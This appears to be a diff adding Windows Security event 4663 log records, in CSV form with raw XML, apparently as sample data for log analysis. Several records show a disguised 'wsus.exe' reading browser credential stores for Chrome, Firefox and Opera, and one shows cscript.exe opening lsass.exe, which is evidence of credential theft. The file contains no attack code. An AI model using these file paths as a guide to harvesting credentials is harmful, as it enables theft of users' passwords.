+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:18.699755Z"">
+    </TimeCreated>
+    <EventRecordID>4990</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:05.308188Z"">
+    </TimeCreated>
+    <EventRecordID>4989</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:31:15.355063Z"">
+    </TimeCreated>
+    <EventRecordID>4988</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""68"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>12802</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-08T22:11:34.340584Z"">
+    </TimeCreated>
+    <EventRecordID>314462</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""160"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x33392</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Process</Data>
+    <Data Name=""ObjectName"">\Device\HarddiskVolume1\Windows\System32\lsass.exe</Data>
+    <Data Name=""HandleId"">0x558</Data>
+    <Data Name=""AccessList"">%%4484 
+				</Data>
+    <Data Name=""AccessMask"">0x10</Data>
+    <Data Name=""ProcessId"">0x1688</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\cscript.exe</Data>
+    <Data Name=""ResourceAttributes"">-</Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:50.134293Z"">
+    </TimeCreated>
+    <EventRecordID>4991</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""44"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:18.699755Z"">
+    </TimeCreated>
+    <EventRecordID>4990</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:33:05.308188Z"">
+    </TimeCreated>
+    <EventRecordID>4989</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12800</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-27T19:31:15.355063Z"">
+    </TimeCreated>
+    <EventRecordID>4988</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""68"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0xffa8</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">File</Data>
+    <Data Name=""ObjectName"">C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data</Data>
+    <Data Name=""HandleId"">0x50</Data>
+    <Data Name=""AccessList"">%%4416 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x134c</Data>
+    <Data Name=""ProcessName"">C:\Users\Defau1t\wsus.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452905</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452904</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452903</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452902</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452901</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452900</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x1ac</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452899</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.335434Z"">
+    </TimeCreated>
+    <EventRecordID>452898</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x420</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
